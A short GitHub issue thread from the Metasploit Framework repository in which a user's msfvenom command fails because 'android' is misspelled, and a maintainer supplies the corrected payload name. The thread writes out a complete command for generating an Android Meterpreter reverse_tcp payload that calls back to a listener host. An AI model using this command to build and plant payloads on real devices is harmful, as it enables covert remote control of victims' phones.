### ISSUE TITLE
Invalid payload selected

### ISSUE THREAD

**Issue by winner1205** [rapid7/metasploit-framework#11658]
## Steps to reproduce

How'd you do it?

1. ...I use a command msfvenom -p andriod/meterpreter/reverse_tcp LHOST=192.168.220.135 LPORT=4444 -f raw >hacker

What actually  matter is that when using metasploit it says invalid payload selected but also I use right syntax with right command 

## Expected behavior

I should have generated a raw payload 

## Current behavior

I shows a error that invalid payload selected 
### Metasploit version
4.14.3.

### I installed Metasploit with:
- [ ] Kali package via apt
### OS

Kali linux

**Comment by timwr** [comment]
Change andriod/meterpreter/reverse_tcp  to android/meterpreter/reverse_tcp.
